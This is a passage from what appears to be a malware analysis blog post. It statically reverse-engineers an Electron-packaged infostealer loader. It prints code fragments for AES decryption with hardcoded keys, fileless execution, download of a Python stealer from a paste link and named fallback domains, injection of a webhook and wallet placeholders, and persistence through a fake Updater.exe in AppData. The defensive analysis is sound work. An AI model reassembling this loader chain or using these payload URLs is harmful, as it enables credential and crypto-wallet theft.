as:",[1254,10348,10349,10360,10368,10374],{},[1257,10350,10351,805,10354,805,10357],{},[63,10352,10353],{},"chrome_100_percent.pak",[63,10355,10356],{},"v8_context_snapshot.bin",[63,10358,10359],{},"d3dcompiler_47.dll",[1257,10361,10362,2901,10365],{},[63,10363,10364],{},"LICENSES.chromium",[63,10366,10367],{},"LICENSES.electron",[1257,10369,10370,10371,10373],{},"A large ",[63,10372,8300],{}," binary (~150 MB)",[1257,10375,10376,10377,10379,10380,10382,10383],{},"A ",[63,10378,9519],{}," folder containing ",[63,10381,8749],{}," and a secondary binary ",[63,10384,10385],{},"elevate.exe",[12,10387,10388],{},[2642,10389],{"alt":10390,"src":10391},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[12,10393,10394,10395,10397],{},"These are all strong indicators of an Electron app, which uses Chromium and Node.js to package JavaScript-based desktop applications. The presence of ",[63,10396,10385],{},", a signed Microsoft binary often used to escalate privileges, raised further suspicion—it could be abused to launch child processes with elevated rights.",[41,10399,10401],{"id":10400},"_52-unpacking-and-static-analysis-deep-dive","5.2 Unpacking and Static Analysis (Deep Dive)",[12,10403,47],{},[12,10405,10406,10407,10409,10410,10412,10413,10415,10416,10418,10419,10422],{},"Rather than executing ",[63,10408,8300],{},", I opted for a static analysis approach to avoid triggering any live behavior. My initial suspicion that ",[63,10411,8300],{}," was built with Electron was confirmed by locating the ",[63,10414,8749],{}," file inside the ",[63,10417,9519],{}," directory. In Electron apps, this archive contains all core application logic, such as JavaScript files, configuration (",[63,10420,10421],{},"package.json","), and assets, packed into a custom format for performance and obfuscation purposes.",[12,10424,399,10425,10428,10429,10432],{},[63,10426,10427],{},".asar"," archive is essentially a read-only, high-performance container similar to ",[63,10430,10431],{},".zip",", but optimized for Electron’s runtime. While not encrypted, it obfuscates code access, making static analysis more challenging unless unpacked.",[12,10434,10435,10436,10439],{},"To unpack it, I used the official ",[63,10437,10438],{},"asar"," tool provided via npm. The steps were:",[56,10441,10443],{"className":262,"code":10442,"language":264,"meta":65,"style":65},"npm install -g asar\nasar extract app.asar extracted_app\n",[63,10444,10445,10459],{"__ignoreMap":65},[102,10446,10447,10450,10453,10456],{"class":104,"line":105},[102,10448,10449],{"class":271},"npm",[102,10451,10452],{"class":289}," install",[102,10454,10455],{"class":275}," -g",[102,10457,10458],{"class":289}," asar\n",[102,10460,10461,10463,10466,10469],{"class":104,"line":111},[102,10462,10438],{"class":271},[102,10464,10465],{"class":289}," extract",[102,10467,10468],{"class":289}," app.asar",[102,10470,10471],{"class":289}," extracted_app\n",[12,10473,10474,10475,10478],{},"Running the above commands extracted the content into a working folder (",[63,10476,10477],{},"extracted_app/","), which revealed the actual JavaScript application code. This included:",[1254,10480,10481,10502,10510],{},[1257,10482,10483,805,10486,805,10489,10492,10493,10495,10496,10498,10499,10501],{},[63,10484,10485],{},"jscryter.js",[63,10487,10488],{},"input.js",[63,10490,10491],{},"obf.js",": These scripts form the malware logic. ",[63,10494,10485],{}," appears to orchestrate payload delivery, ",[63,10497,10488],{}," defines configuration constants or command logic, and ",[63,10500,10491],{}," is a heavily obfuscated script likely containing the core payload logic.",[1257,10503,10504,805,10506,10509],{},[63,10505,10421],{},[63,10507,10508],{},"package-lock.json",": Define the runtime environment",[1257,10511,10512,10515,10516,805,10519,805,10522],{},[63,10513,10514],{},"node_modules/",": Contains all dependencies like ",[63,10517,10518],{},"axios",[63,10520,10521],{},"adm-zip",[63,10523,10524],{},"child_process",[12,10526,10527,10528,10530,10531,1013],{},"The unpacked contents enabled complete visibility into the logic of the malware without requiring execution, which was essential for safe reverse engineering. This step confirmed that ",[63,10529,8300],{}," served purely as a runtime wrapper for the malicious scripts hidden inside ",[63,10532,8749],{},[41,10534,10536],{"id":10535},"_53-what-the-static-analysis-revealed","5.3. What the Static Analysis Revealed",[12,10538,47],{},[12,10540,10541],{},"By manually inspecting the code, I confirmed the malware logic was fully JavaScript-based, executed within the Electron runtime. The scripts were designed to:",[1254,10543,10544,10551,10556,10559],{},[1257,10545,10546,10547,10550],{},"Download an encrypted payload (",[63,10548,10549],{},"pyth.zip",") from fallback URLs",[1257,10552,10553,10554],{},"Extract the archive using ",[63,10555,10521],{},[1257,10557,10558],{},"Perform string replacement to inject specific credentials or wallet addresses",[1257,10560,10561,10562,10564,10565,2901,10568],{},"Launch the resulting Python file (",[63,10563,8304],{},") via ",[63,10566,10567],{},"child_process.exec()",[63,10569,8276],{},[12,10571,10572,10573,10579],{},"Crucially, the loader also included logic to ",[251,10574,10575,10576,10578],{},"copy ",[63,10577,8296],{}," into the user's AppData directory"," if it wasn't already present—reinforcing persistence and maintaining the infection loop.",[25,10581,10583,10584,10586],{"id":10582},"_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","6. Deep Dive: ",[63,10585,10488],{}," – The Encrypted JavaScript Payload Loader",[12,10588,31],{},[12,10590,10591,10593],{},[63,10592,10488],{}," is a critical component in the analyzed malware chain, functioning as the decryption and execution hub for an encrypted JavaScript payload. This script hides its core functionality behind a strong encryption layer and only reveals its behavior during runtime.",[41,10595,10597],{"id":10596},"_61-encryption-and-decryption-mechanics","6.1 Encryption and Decryption Mechanics",[12,10599,47],{},[12,10601,10602,10603,10605],{},"At first glance, ",[63,10604,10488],{}," contains very little readable code. However, its primary purpose is to decrypt and execute a large obfuscated JavaScript blob stored within the script itself.",[186,10607,10609],{"id":10608},"_611-decryption-logic","6.1.1 Decryption Logic",[12,10611,192],{},[12,10613,10614,10615,10618],{},"The script defines a ",[63,10616,10617],{},"decrypt()"," function that accepts four parameters:",[1254,10620,10621,10627,10633,10639],{},[1257,10622,10623,10626],{},[63,10624,10625],{},"encdata",": The encrypted Base64-encoded data",[1257,10628,10629,10632],{},[63,10630,10631],{},"masterkey",": A plaintext passphrase",[1257,10634,10635,10638],{},[63,10636,10637],{},"salt",": A cryptographic salt (Base64)",[1257,10640,10641,10644],{},[63,10642,10643],{},"iv",": The initialization vector for AES decryption (Base64)",[12,10646,10647,10648,10651],{},"The decryption process is implemented using Node.js’s built-in ",[63,10649,10650],{},"crypto"," module. It proceeds as follows:",[3259,10653,10654,10761,10873],{},[1257,10655,10656,10659,10660,10735],{},[251,10657,10658],{},"Key Derivation:","\nThe script derives a 256-bit symmetric key using PBKDF2 (Password-Based Key Derivation Function 2):",[56,10661,10665],{"className":10662,"code":10663,"language":10664,"meta":65,"style":65},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n  masterkey,\n  Buffer.from(salt, \"base64\"),\n  100000,\n  32,\n  \"sha512\",\n);\n","js",[63,10666,10667,10687,10692,10709,10717,10724,10731],{"__ignoreMap":65},[102,10668,10669,10672,10675,10678,10681,10684],{"class":104,"line":105},[102,10670,10671],{"class":285},"const",[102,10673,10674],{"class":275}," key",[102,10676,10677],{"class":285}," =",[102,10679,10680],{"class":293}," crypto.",[102,10682,10683],{"class":271},"pbkdf2Sync",[102,10685,10686],{"class":293},"(\n",[102,10688,10689],{"class":104,"line":111},[102,10690,10691],{"class":293},"  masterkey,\n",[102,10693,10694,10697,10700,10703,10706],{"class":104,"line":329},[102,10695,10696],{"class":293},"  Buffer.",[102,10698,10699],{"class":271},"from",[102,10701,10702],{"class":293},"(salt, ",[102,10704,10705],{"class":289},"\"base64\"",[102,10707,10708],{"class":293},"),\n",[102,10710,10711,10714],{"class":104,"line":346},[102,10712,10713],{"class":275},"  100000",[102,10715,10716],{"class":293},",\n",[102,10718,10719,10722],{"class":104,"line":650},[102,10720,10721],{"class":275},"  32",[102,10723,10716],{"class":293},[102,10725,10726,10729],{"class":104,"line":656},[102,10727,10728],{"class":289},"  \"sha512\"",[102,10730,10716],{"class":293},[102,10732,10733],{"class":104,"line":662},[102,10734,825],{"class":293},[1254,10736,10737,10743,10749,10755],{},[1257,10738,10739,10742],{},[251,10740,10741],{},"Hash function:"," SHA-512",[1257,10744,10745,10748],{},[251,10746,10747],{},"Iterations:"," 100,000",[1257,10750,10751,10754],{},[251,10752,10753],{},"Key length:"," 32 bytes (256 bits)",[1257,10756,10757,10760],{},[251,10758,10759],{},"Salt:"," Supplied as a Base64-decoded input",[1257,10762,10763,10766,10767,10817,10819,10820],{},[251,10764,10765],{},"AES-256-CBC Decryption:","\nThe derived key is then used to create an AES decipher object:",[56,10768,10770],{"className":10662,"code":10769,"language":10664,"meta":65,"style":65},"const decipher = crypto.createDecipheriv(\n  \"aes-256-cbc\",\n  key,\n  Buffer.from(iv, \"base64\"),\n);\n",[63,10771,10772,10788,10795,10800,10813],{"__ignoreMap":65},[102,10773,10774,10776,10779,10781,10783,10786],{"class":104,"line":105},[102,10775,10671],{"class":285},[102,10777,10778],{"class":275}," decipher",[102,10780,10677],{"class":285},[102,10782,10680],{"class":293},[102,10784,10785],{"class":271},"createDecipheriv",[102,10787,10686],{"class":293},[102,10789,10790,10793],{"class":104,"line":111},[102,10791,10792],{"class":289},"  \"aes-256-cbc\"",[102,10794,10716],{"class":293},[102,10796,10797],{"class":104,"line":329},[102,10798,10799],{"class":293},"  key,\n",[102,10801,10802,10804,10806,10809,10811],{"class":104,"line":346},[102,10803,10696],{"class":293},[102,10805,10699],{"class":271},[102,10807,10808],{"class":293},"(iv, ",[102,10810,10705],{"class":289},[102,10812,10708],{"class":293},[102,10814,10815],{"class":104,"line":650},[102,10816,825],{"class":293},[531,10818],{},"The encrypted payload is decrypted using standard CBC (Cipher Block Chaining) mode:",[56,10821,10823],{"className":10662,"code":10822,"language":10664,"meta":65,"style":65},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[63,10824,10825,10854],{"__ignoreMap":65},[102,10826,10827,10830,10833,10836,10839,10842,10845,10847,10849,10852],{"class":104,"line":105},[102,10828,10829],{"class":285},"let",[102,10831,10832],{"class":293}," decrypted ",[102,10834,10835],{"class":285},"=",[102,10837,10838],{"class":293}," decipher.",[102,10840,10841],{"class":271},"update",[102,10843,10844],{"class":293},"(encdata, ",[102,10846,10705],{"class":289},[102,10848,805],{"class":293},[102,10850,10851],{"class":289},"\"utf8\"",[102,10853,825],{"class":293},[102,10855,10856,10859,10862,10864,10867,10869,10871],{"class":104,"line":111},[102,10857,10858],{"class":293},"decrypted ",[102,10860,10861],{"class":285},"+=",[102,10863,10838],{"class":293},[102,10865,10866],{"class":271},"final",[102,10868,545],{"class":293},[102,10870,10851],{"class":289},[102,10872,825],{"class":293},[1257,10874,10875,10878,10879,10882,10883,10904,10906],{},[251,10876,10877],{},"Dynamic Execution:","\nThe decrypted JavaScript code is never written to disk. Instead, it is dynamically executed in memory using the ",[63,10880,10881],{},"Function"," constructor:",[56,10884,10886],{"className":10662,"code":10885,"language":10664,"meta":65,"style":65},"new Function(\"require\", decrypted)(require);\n",[63,10887,10888],{"__ignoreMap":65},[102,10889,10890,10893,10896,10898,10901],{"class":104,"line":105},[102,10891,10892],{"class":285},"new",[102,10894,10895],{"class":271}," Function",[102,10897,545],{"class":293},[102,10899,10900],{"class":289},"\"require\"",[102,10902,10903],{"class":293},", decrypted)(require);\n",[531,10905],{},"This technique enables fileless execution, reducing the chance of detection by traditional antivirus engines that rely on disk-based scanning.",[12,10908,10909],{},"This approach demonstrates a layered defense against reverse engineering by combining key derivation, strong encryption, and dynamic in-memory execution.",[12,10911,10912],{},[251,10913,10914],{},"Key Material and Encrypted Data",[12,10916,10917],{},"The script includes the following hardcoded inputs:",[1254,10919,10920,10926,10934,10942],{},[1257,10921,10922,10925],{},[251,10923,10924],{},"Encrypted Data:"," A massive Base64-encoded blob",[1257,10927,10928,540,10931],{},[251,10929,10930],{},"Master Key:",[63,10932,10933],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[1257,10935,10936,540,10938,10941],{},[251,10937,10759],{},[63,10939,10940],{},"maXtklzMEZRY9dbul/XPSw=="," (Base64-encoded)",[1257,10943,10944,540,10947,10941],{},[251,10945,10946],{},"IV:",[63,10948,10949],{},"HwK6sOz7FBbL+YsrOxtYUg==",[12,10951,10952,10953,1013],{},"These are all embedded directly in the source code of ",[63,10954,10488],{},[41,10956,10958],{"id":10957},"_62-post-decryption-payload-behavior","6.2 Post-Decryption Payload Behavior",[12,10960,47],{},[12,10962,10963],{},"Once decrypted, the embedded payload becomes a full JavaScript program that performs the following malicious actions:",[186,10965,10967],{"id":10966},"_621-environment-preparation","6.2.1 Environment Preparation",[12,10969,192],{},[12,10971,10972],{},"The decrypted payload begins by setting up its execution environment using built-in Node.js modules. This setup phase ensures that all required paths and working directories are clearly defined before any malicious behavior occurs.",[1254,10974,10975,11008],{},[1257,10976,10977,10980,10981,10984,10985],{},[251,10978,10979],{},"Temporary Directory Resolution:","\nThe malware calls ",[63,10982,10983],{},"os.tmpdir()"," to determine the path to the current system's temporary directory. This is a common tactic for malware as temporary folders are typically writable and less scrutinized by endpoint protection systems.",[56,10986,10988],{"className":10662,"code":10987,"language":10664,"meta":65,"style":65},"const tempDir = os.tmpdir();\n",[63,10989,10990],{"__ignoreMap":65},[102,10991,10992,10994,10997,10999,11002,11005],{"class":104,"line":105},[102,10993,10671],{"class":285},[102,10995,10996],{"class":275}," tempDir",[102,10998,10677],{"class":285},[102,11000,11001],{"class":293}," os.",[102,11003,11004],{"class":271},"tmpdir",[102,11006,11007],{"class":293},"();\n",[1257,11009,11010,11013,11014,11027],{},[251,11011,11012],{},"Path Construction:","\nThe script then constructs absolute paths for two important files:",[1254,11015,11016,11021],{},[1257,11017,11018,11020],{},[63,11019,10549],{},": The archive that contains the actual second-stage Python-based stealer",[1257,11022,11023,11026],{},[63,11024,11025],{},"bnd.exe",": An optional executable file that may serve as a persistence backdoor or additional payload",[56,11028,11030],{"className":10662,"code":11029,"language":10664,"meta":65,"style":65},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[63,11031,11032,11055],{"__ignoreMap":65},[102,11033,11034,11036,11039,11041,11044,11047,11050,11053],{"class":104,"line":105},[102,11035,10671],{"class":285},[102,11037,11038],{"class":275}," tempFile",[102,11040,10677],{"class":285},[102,11042,11043],{"class":293}," path.",[102,11045,11046],{"class":271},"join",[102,11048,11049],{"class":293},"(tempDir, ",[102,11051,11052],{"class":289},"\"pyth.zip\"",[102,11054,825],{"class":293},[102,11056,11057,11059,11062,11064,11066,11068,11070,11073],{"class":104,"line":111},[102,11058,10671],{"class":285},[102,11060,11061],{"class":275}," binderFile",[102,11063,10677],{"class":285},[102,11065,11043],{"class":293},[102,11067,11046],{"class":271},[102,11069,11049],{"class":293},[102,11071,11072],{"class":289},"\"bnd.exe\"",[102,11074,825],{"class":293},[12,11076,11077],{},"This path setup abstracts away OS-specific path syntax and enables the malware to operate seamlessly on any Windows system. It also sets the stage for the file download and unpacking mechanisms that follow.",[186,11079,11081],{"id":11080},"_622-payload-download-with-fallback-strategy","6.2.2 Payload Download with Fallback Strategy",[12,11083,192],{},[12,11085,11086],{},"The second major phase of the decrypted JavaScript payload involves downloading a malicious ZIP archive from remote sources. This mechanism is designed with a multi-tiered fallback strategy to increase resilience and availability.",[1254,11088,11089,11120,11205,11239],{},[1257,11090,11091,11094,11095,11114,11116,11117,11119],{},[251,11092,11093],{},"Primary Link Resolution via Rentry.co","\nThe script begins by resolving a dynamic URL from a text paste service. It sends a GET request to:",[56,11096,11098],{"className":10662,"code":11097,"language":10664,"meta":65,"style":65},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[63,11099,11100],{"__ignoreMap":65},[102,11101,11102,11104,11107,11109,11112],{"class":104,"line":105},[102,11103,10671],{"class":285},[102,11105,11106],{"class":275}," url",[102,11108,10677],{"class":285},[102,11110,11111],{"class":289}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[102,11113,1364],{"class":293},[531,11115],{},"This returns a plain-text URL string pointing to the actual location of the ",[63,11118,10549],{}," archive. Using a redirection mechanism like this is a common obfuscation technique—it abstracts the real malicious URL and makes static detection harder.",[1257,11121,11122,11125,11126,11158,11160,11161,11163,11164,11198,11200,11201,11204],{},[251,11123,11124],{},"Download Execution","\nThe resolved URL is then requested using the Axios library with a response stream:",[56,11127,11129],{"className":10662,"code":11128,"language":10664,"meta":65,"style":65},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[63,11130,11131],{"__ignoreMap":65},[102,11132,11133,11135,11138,11140,11143,11146,11149,11152,11155],{"class":104,"line":105},[102,11134,10671],{"class":285},[102,11136,11137],{"class":275}," fileResponse",[102,11139,10677],{"class":285},[102,11141,11142],{"class":285}," await",[102,11144,11145],{"class":293}," axios.",[102,11147,11148],{"class":271},"get",[102,11150,11151],{"class":293},"(fileUrl, { responseType: ",[102,11153,11154],{"class":289},"\"stream\"",[102,11156,11157],{"class":293}," });\n",[531,11159],{},"The file is written to disk as ",[63,11162,10549],{}," in the system's temp directory:",[56,11165,11167],{"className":10662,"code":11166,"language":10664,"meta":65,"style":65},"const writer = fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[63,11168,11169,11187],{"__ignoreMap":65},[102,11170,11171,11173,11176,11178,11181,11184],{"class":104,"line":105},[102,11172,10671],{"class":285},[102,11174,11175],{"class":275}," writer",[102,11177,10677],{"class":285},[102,11179,11180],{"class":293}," fs.",[102,11182,11183],{"class":271},"createWriteStream",[102,11185,11186],{"class":293},"(tempFile);\n",[102,11188,11189,11192,11195],{"class":104,"line":111},[102,11190,11191],{"class":293},"fileResponse.data.",[102,11193,11194],{"class":271},"pipe",[102,11196,11197],{"class":293},"(writer);\n",[531,11199],{},"This download is wrapped in a ",[63,11202,11203],{},"Promise"," to ensure synchronous completion before further logic is executed.",[1257,11206,11207,11210,11211,11236,11238],{},[251,11208,11209],{},"Fallback URLs","\nIf the Rentry-based link fails, the script attempts hardcoded backup locations:",[56,11212,11214],{"className":10662,"code":11213,"language":10664,"meta":65,"style":65},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[63,11215,11216,11227],{"__ignoreMap":65},[102,11217,11218,11221,11223],{"class":104,"line":105},[102,11219,11220],{"class":271},"https",[102,11222,1550],{"class":293},[102,11224,11226],{"class":11225},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[102,11228,11229,11231,11233],{"class":104,"line":111},[102,11230,11220],{"class":271},[102,11232,1550],{"class":293},[102,11234,11235],{"class":11225},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[531,11237],{},"These domains are structured to appear as part of standard TLS validation folders, possibly mimicking Let's Encrypt or domain validation paths to reduce suspicion. Each fallback is retried with the same streaming and file-write logic.",[1257,11240,11241,11244,11245,11248],{},[251,11242,11243],{},"Robustness and Obfuscation","\nThis fallback mechanism ensures that the malware has multiple retrieval paths for its second-stage payload. The use of a dynamic pointer (",[63,11246,11247],{},"rentry.co",") and multiple failover mirrors makes the malware more resilient to takedowns, blocking, and DNS sinkholes.",[12,11250,11251],{},"This phase demonstrates careful operational planning by the malware authors, using layered redundancy and well-camouflaged delivery infrastructure.",[1254,11253,11254,11260],{},[1257,11255,11256,11257,11259],{},"Downloads ",[63,11258,10549],{}," from the resolved URL",[1257,11261,11262,11263],{},"If that fails, it attempts fallback mirrors:\n",[1254,11264,11265,11270],{},[1257,11266,11267],{},[63,11268,11269],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[1257,11271,11272],{},[63,11273,11274],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[186,11276,11278],{"id":11277},"_623-payload-extraction-and-manipulation","6.2.3 Payload Extraction and Manipulation",[12,11280,192],{},[12,11282,11283,11284,11286,11287,11289],{},"Once the ",[63,11285,10549],{}," archive has been successfully downloaded and saved to disk, the malware proceeds to extract its contents and prepare them for execution. This is accomplished using the ",[63,11288,10521],{}," Node.js library, which allows programmatic handling of ZIP files.",[1254,11291,11292,11339,11366],{},[1257,11293,11294,11297,11333,11335,11336,11338],{},[251,11295,11296],{},"ZIP Extraction:",[56,11298,11300],{"className":10662,"code":11299,"language":10664,"meta":65,"style":65},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[63,11301,11302,11319],{"__ignoreMap":65},[102,11303,11304,11306,11309,11311,11314,11317],{"class":104,"line":105},[102,11305,10671],{"class":285},[102,11307,11308],{"class":275}," zip",[102,11310,10677],{"class":285},[102,11312,11313],{"class":285}," new",[102,11315,11316],{"class":271}," AdmZip",[102,11318,11186],{"class":293},[102,11320,11321,11324,11327,11329,11331],{"class":104,"line":111},[102,11322,11323],{"class":293},"zip.",[102,11325,11326],{"class":271},"extractAllTo",[102,11328,11049],{"class":293},[102,11330,3821],{"class":275},[102,11332,825],{"class":293},[531,11334],{},"This extracts all contents of the archive to the system's temporary directory. The ",[63,11337,3821],{}," flag ensures overwriting of any existing files.",[1257,11340,11341,11344,11345,11347,11348],{},[251,11342,11343],{},"Archive Contents:","\nThe archive ",[63,11346,10549],{}," includes a fully bundled Python project, including:",[1254,11349,11350,11353,11356],{},[1257,11351,11352],{},"A directory structure resembling a legitimate Python package",[1257,11354,11355],{},"Several Python modules and dependencies",[1257,11357,11358,11359,11361,11362,11365],{},"The key file ",[63,11360,8304],{}," located at ",[63,11363,11364],{},"Crypto/Util/astor.py",", which is the main stealer payload",[1257,11367,11368,11371,11372,11374,11375,11395],{},[251,11369,11370],{},"Placeholder Replacement:","\nThe malware performs dynamic substitution of predefined placeholders within ",[63,11373,8304],{}," to inject attacker-controlled configuration data such as:",[1254,11376,11377,11380,11383,11389],{},[1257,11378,11379],{},"A Discord webhook URL",[1257,11381,11382],{},"Cryptocurrency wallet addresses (BTC, ETH, DOGE, LTC, XMR, etc.)",[1257,11384,11385,11386,1288],{},"A user identifier (",[63,11387,11388],{},"%USERID%",[1257,11390,11391,11392,1288],{},"An error status flag (",[63,11393,11394],{},"%ERRORSTATUS%",[56,11396,11398],{"className":10662,"code":11397,"language":10664,"meta":65,"style":65},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n  let updatedFile = data\n    .replace(\"%DISCORD%\", \u003Cwebhook>)\n    .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n    ...\n    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n\n  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[63,11399,11400,11459,11472,11495,11505,11510,11515,11520,11525],{"__ignoreMap":65},[102,11401,11402,11405,11408,11411,11413,11416,11419,11422,11425,11428,11431,11434,11436,11439,11442,11446,11448,11451,11453,11456],{"class":104,"line":105},[102,11403,11404],{"class":293},"fs.",[102,11406,11407],{"class":271},"readFile",[102,11409,11410],{"class":293},"(extractedDir ",[102,11412,1294],{"class":285},[102,11414,11415],{"class":289}," \"",[102,11417,11418],{"class":275},"\\C",[102,11420,11421],{"class":289},"rypto",[102,11423,11424],{"class":275},"\\U",[102,11426,11427],{"class":289},"til",[102,11429,11430],{"class":275},"\\a",[102,11432,11433],{"class":289},"stor.py\"",[102,11435,805],{"class":293},[102,11437,11438],{"class":289},"'utf8'",[102,11440,11441],{"class":293},", (",[102,11443,11445],{"class":11444},"s4XuR","err",[102,11447,805],{"class":293},[102,11449,11450],{"class":11444},"data",[102,11452,7362],{"class":293},[102,11454,11455],{"class":285},"=>",[102,11457,11458],{"class":293}," {\n",[102,11460,11461,11464,11467,11469],{"class":104,"line":111},[102,11462,11463],{"class":285},"  let",[102,11465,11466],{"class":293}," updatedFile ",[102,11468,10835],{"class":285},[102,11470,11471],{"class":293}," data\n",[102,11473,11474,11477,11480,11482,11485,11488,11492],{"class":104,"line":329},[102,11475,11476],{"class":293},"    .",[102,11478,11479],{"class":271},"replace",[102,11481,545],{"class":293},[102,11483,11484],{"class":289},"\"%DISCORD%\"",[102,11486,11487],{"class":293},", \u003C",[102,11489,11491],{"class":11490},"s9eBZ","webhook",[102,11493,11494],{"class":293},">)\n",[102,11496,11497,11500,11503],{"class":104,"line":346},[102,11498,11499],{"class":293},"    .replace(\"%ADDRESSBTC%\", \u003C",[102,11501,11502],{"class":275},"btc_address",[102,11504,11494],{"class":293},[102,11506,11507],{"class":104,"line":650},[102,11508,11509],{"class":293},"    ...\n",[102,11511,11512],{"class":104,"line":656},[102,11513,11514],{"class":293},"    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[102,11516,11517],{"class":104,"line":662},[102,11518,11519],{"emptyLinePlaceholder":2181},"\n",[102,11521,11522],{"class":104,"line":668},[102,11523,11524],{"class":293},"  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[102,11526,11527],{"class":104,"line":674},[102,11528,11529],{"class":293},"});\n",[12,11531,11532],{},"This dynamic manipulation phase is essential. By delaying the insertion of attacker-controlled values until runtime, the payload avoids static detection and allows the operator to adapt targets and exfiltration endpoints without repackaging the archive.",[1254,11534,11535],{},[1257,11536,11537,11538,11540,11541],{},"Replaces placeholder strings in ",[63,11539,8304],{},":\n",[1254,11542,11543,11549,11559],{},[1257,11544,11545,11546],{},"Discord webhook: ",[63,11547,11548],{},"%DISCORD%",[1257,11550,11551,11552,805,11555,11558],{},"Wallet addresses: ",[63,11553,11554],{},"%ADDRESSBTC%",[63,11556,11557],{},"%ADDRESSETH%",", etc.",[1257,11560,11561],{},"User ID and error flags",[186,11563,11565],{"id":11564},"_624-malware-execution","6.2.4 Malware Execution",[12,11567,192],{},[1254,11569,11570],{},[1257,11571,11572,11573],{},"Once the placeholder injection into astor.py is complete, the malware initiates execution of the stealer via a system call",[56,11574,11576],{"className":10662,"code":11575,"language":10664,"meta":65,"style":65},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[63,11577,11578],{"__ignoreMap":65},[102,11579,11580,11583,11585,11588,11591,11594,11596,11599],{"class":104,"line":105},[102,11581,11582],{"class":271},"exec",[102,11584,545],{"class":293},[102,11586,11587],{"class":289},"\"python.exe Crypto",[102,11589,11590],{"class":275},"\\\\",[102,11592,11593],{"class":289},"Util",[102,11595,11590],{"class":275},[102,11597,11598],{"class":289},"astor.py\"",[102,11600,825],{"class":293},[12,11602,11603],{},"This command is executed using Node.js’s child_process.exec function and launches the embedded Python payload in a separate process. This specific execution pattern—python.exe with the argument Crypto\\Util\\astor.py—was observed in telemetry data collected by Microsoft Defender for Endpoint, making it a reliable detection artifact. In practice, the execution chain looks like this:",[12,11605,11606],{},"The full malware execution chain, as observed in Microsoft Defender for Endpoint telemetry, follows this sequence:",[1254,11608,11609,11617,11624,11631],{},[1257,11610,11611,11613,11614],{},[63,11612,8300],{}," (Electron-based container) invokes ",[63,11615,11616],{},"node.exe",[1257,11618,11619,11621,11622],{},[63,11620,11616],{}," launches ",[63,11623,8804],{},[1257,11625,11626,11628,11629],{},[63,11627,8804],{}," starts ",[63,11630,8276],{},[1257,11632,11633,11635,11636],{},[63,11634,8276],{}," executes the file ",[63,11637,8814],{},[186,11639,11641],{"id":11640},"_625-persistence-reinforcement","6.2.5 Persistence Reinforcement",[12,11643,192],{},[12,11645,11646,11647,11649],{},"To ensure long-term presence on the infected system, the decrypted JavaScript payload includes logic to re-establish persistence by copying the initial binary (",[63,11648,8296],{},") to a hidden location within the user’s profile.",[12,11651,11652],{},[251,11653,11654],{},"Target Directory",[12,11656,11657],{},"The file is copied to a directory that mimics legitimate Windows components:",[56,11659,11661],{"className":10662,"code":11660,"language":10664,"meta":65,"style":65},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[63,11662,11663],{"__ignoreMap":65},[102,11664,11665,11667,11670,11672],{"class":104,"line":105},[102,11666,1277],{"class":285},[102,11668,11669],{"class":275},"APPDATA",[102,11671,1277],{"class":285},[102,11673,11674],{"class":293},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[12,11676,11677],{},"This location is intentionally chosen:",[1254,11679,11680,11683],{},[1257,11681,11682],{},"%APPDATA% is writable by regular users and doesn’t require administrative privileges.",[1257,11684,11685],{},"The directory name mimics legitimate Microsoft application folders, making it less suspicious.",[12,11687,11688],{},[251,11689,11690],{},"Copy Mechanism:",[12,11692,11693],{},"The copy operation uses Node.js’s fs.copyFileSync() function:",[56,11695,11697],{"className":10662,"code":11696,"language":10664,"meta":65,"style":65},"fs.copyFileSync(\n  process.env.PORTABLE_EXECUTABLE_FILE,\n  path.join(\n    process.env.APPDATA,\n    \"Microsoft\",\n    \"Internet Explorer\",\n    \"UserData\",\n    \"Updater.exe\",\n  ),\n);\n",[63,11698,11699,11708,11718,11727,11736,11743,11750,11757,11764,11769],{"__ignoreMap":65},[102,11700,11701,11703,11706],{"class":104,"line":105},[102,11702,11404],{"class":293},[102,11704,11705],{"class":271},"copyFileSync",[102,11707,10686],{"class":293},[102,11709,11710,11713,11716],{"class":104,"line":111},[102,11711,11712],{"class":293},"  process.env.",[102,11714,11715],{"class":275},"PORTABLE_EXECUTABLE_FILE",[102,11717,10716],{"class":293},[102,11719,11720,11723,11725],{"class":104,"line":329},[102,11721,11722],{"class":293},"  path.",[102,11724,11046],{"class":271},[102,11726,10686],{"class":293},[102,11728,11729,11732,11734],{"class":104,"line":346},[102,11730,11731],{"class":293},"    process.env.",[102,11733,11669],{"class":275},[102,11735,10716],{"class":293},[102,11737,11738,11741],{"class":104,"line":650},[102,11739,11740],{"class":289},"    \"Microsoft\"",[102,11742,10716],{"class":293},[102,11744,11745,11748],{"class":104,"line":656},[102,11746,11747],{"class":289},"    \"Internet 